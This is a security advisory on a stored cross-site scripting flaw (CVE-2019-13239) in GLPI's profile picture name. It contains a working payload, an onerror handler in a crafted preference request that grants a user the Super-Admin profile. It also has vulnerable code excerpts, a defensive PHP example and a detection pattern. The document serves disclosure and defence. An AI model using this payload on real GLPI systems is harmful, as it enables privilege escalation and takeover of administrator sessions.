ASA-2019-00476 – GLPI: Stored Cross-Site Scripting (XSS) in the profile picture name


Allele Security Alert

ASA-2019-00476

Identifier(s)

ASA-2019-00476, CVE-2019-13239

Title

Stored Cross-Site Scripting (XSS) in the profile picture name

Vendor(s)

GLPI Project

Product(s)

GLPI

Affected version(s)

GLPI versions 9.x before 9.4.3

Fixed version(s)

GLPI version 9.4.3

Proof of concept

Yes

Description

It has been discovered that GLPI does not sanitize the profile picture name, which can be used to inject malicious HTML and JavaScript code into the page. If an administrator accesses the profile, the injected code runs in the administrator's session and can interact with the GLPI instance with the administrator's privileges, performing sensitive actions such as adding the low-privileged account to the Super-Admin profile.

Technical details

The user profile form allows uploading images as profile picture. This is done in 2 steps:

  1. AJAX upload of the file.
  2. Update the profile with the filename retrieved from the 1st AJAX request.

The profile picture field holds the filename of the uploaded image, and this filename is stored in the database.

The POST request looks like:

POST /front/preference.php HTTP/1.1 
Host: 172.18.0.3
[…] 

------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="name"

testuser 
------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="id" 

5 
------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="realname"

------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="_picture[0]" 

5c6fc312b8ab50.57540855chat5.jpg
------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="_prefix_picture[0]" 

5c6fc312b8ab50.57540855 
------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="_tag_picture[0]"

435b1b81-d9d62df8-5c6fc312c12e01.39237464
------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="picture[]"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="_blank_picture" 
[…]

However, the code handling the preferences form passes the raw request inputs straight to the user model's update method:

if (isset($_POST["update"]) && ($_POST["id"] === Session::getLoginUserID())) { 
       $user->update($_POST); 
[...]

Because the user model has a picture field, the profile can be updated with a picture value containing malicious HTML attributes, which execute JavaScript in the browser of anyone viewing the profile. For instance, the following preferences update can be used to perform a privilege escalation inside the application if an administrator views the profile:

POST /front/preference.php HTTP/1.1 
Host: 172.18.0.3 
[…] 

------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="name" 

testuser 
------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="id" 

5 
[…] 
------WebKitFormBoundarynhQG0l132nzGvcpA 
Content-Disposition: form-data; name="picture[]"; filename="" 
Content-Type: application/octet-stream 

'
onerror="$.ajax({url:'/front/profile_user.form.php',method:'POST',data:'users_id=5&entities_id=0&profiles_id=4&is_recursive=0&add=Add&_glpi_csrf_token='+$('input[name=_glpi_csrf_token]').val()});" a='

This payload will add the Super-Admin profile (profiles_id=4) to the user (users_id=5).

The stored value is output without any sanitization by the showMyForm function in inc/user.class.php:

[...]
$full_picture = "<div class='user_picture_border'>";
$full_picture .= "<img class='user_picture' alt=\"".__s('Picture')."\" src='".
User::getURLForPicture($this->fields['picture'])."'>";
$full_picture .= "</div>";
[...]

The getURLForPicture function does not sanitize the string either, so the single quote in the stored name closes the src attribute and the rest of the value is parsed as additional HTML attributes.
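The following is an added example, not GLPI's code and not the fix from the referenced commit. It reproduces the attribute break-out with a hypothetical picture_url() standing in for User::getURLForPicture(), and shows three independent defences a practitioner would want: escaping at output, validating the filename before it reaches the model (the allow-list pattern is an assumption derived from the example name above), and a check over already-stored values. The model field name picture is taken from the advisory; the sample rows and the trimmed payload are constructed.

```php
<?php
// Added illustration for CVE-2019-13239; this is not GLPI's code and does not
// reproduce the fix from the referenced commit. picture_url() is a hypothetical
// stand-in for User::getURLForPicture(): it only prepends a base path and, as
// the advisory describes, performs no escaping.
declare(strict_types=1);

function picture_url(string $picture): string
{
    return '/pictures/' . $picture; // hypothetical URL layout
}

// Vulnerable rendering, mirroring the concatenation in showMyForm(): the
// filename lands inside a single-quoted src attribute untouched.
function render_picture_vulnerable(string $picture): string
{
    return "<div class='user_picture_border'>"
         . "<img class='user_picture' alt=\"Picture\" src='" . picture_url($picture) . "'>"
         . "</div>";
}

// Fix at output: HTML-escape the URL. ENT_QUOTES matters because the attribute
// is single-quoted; htmlspecialchars() leaves ' alone with its default flags.
function render_picture_fixed(string $picture): string
{
    $url = htmlspecialchars(picture_url($picture), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class='user_picture_border'>"
         . "<img class='user_picture' alt=\"Picture\" src='" . $url . "'>"
         . "</div>";
}

// Fix at input: accept only names shaped like the ones the upload step makes.
// The pattern is an assumption derived from the example name in the advisory
// (hex prefix, a dot, digits, the original basename, an image extension).
function is_valid_picture_name(string $picture): bool
{
    return preg_match('/^[0-9a-f]+\.[0-9]+[A-Za-z0-9_-]+\.(jpe?g|png|gif)$/', $picture) === 1;
}

// Mass-assignment guard for the preference handler: instead of $user->update($_POST),
// keep only known keys and drop a picture value that fails validation.
function filter_preferences(array $post, array $allowed): array
{
    $clean = array_intersect_key($post, array_flip($allowed));
    if (isset($clean['picture']) && !is_valid_picture_name((string) $clean['picture'])) {
        unset($clean['picture']);
    }
    return $clean;
}

// Detection for already-stored values: flag rows whose picture column carries
// attribute-breaking characters or an on* handler.
function suspicious_picture_names(array $rows): array
{
    $hits = [];
    foreach ($rows as $row) {
        if (preg_match('/[\'"<>]|\bon[a-z]+\s*=/i', (string) $row['picture']) === 1) {
            $hits[] = $row['id'];
        }
    }
    return $hits;
}

// Constructed sample data: the benign name from the advisory's first request
// and a trimmed version of its payload.
$benign  = '5c6fc312b8ab50.57540855chat5.jpg';
$payload = "' onerror=\"alert(document.domain)\" a='";

echo render_picture_vulnerable($payload), PHP_EOL;
echo render_picture_fixed($payload), PHP_EOL;

var_dump(is_valid_picture_name($benign), is_valid_picture_name($payload));

$post = ['id' => 5, 'name' => 'testuser', 'picture' => $payload, 'update' => 'Save'];
print_r(filter_preferences($post, ['name', 'realname', 'picture']));

print_r(suspicious_picture_names([
    ['id' => 2, 'picture' => $benign],
    ['id' => 5, 'picture' => $payload],
]));
```

In the first echo the leading quote of the payload closes the src attribute and onerror becomes a real attribute of the img element; in the second the quotes are entity-encoded and the whole string stays inside src. The request shown earlier carries the filename under _picture[0] rather than a plain picture key, so in a real handler the form field must be mapped to the model field before the filter is applied; the point of filter_preferences() is that the raw $_POST array never reaches update() unfiltered.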

Credits

Julien Legras (Synacktiv)

Reference(s)

Stored XSS in GLPI < 9.4.3
https://www.synacktiv.com/ressources/advisories/GLPI_9.4.0_stored_XSS.pdf

avoid xss attack on user picture
https://github.com/glpi-project/glpi/commit/c2aa7a7cd6af28be3809acc7e7842d2d2008c0fb

CVE-2019-13239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13239

CVE-2019-13239
https://nvd.nist.gov/vuln/detail/CVE-2019-13239

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: August 5, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.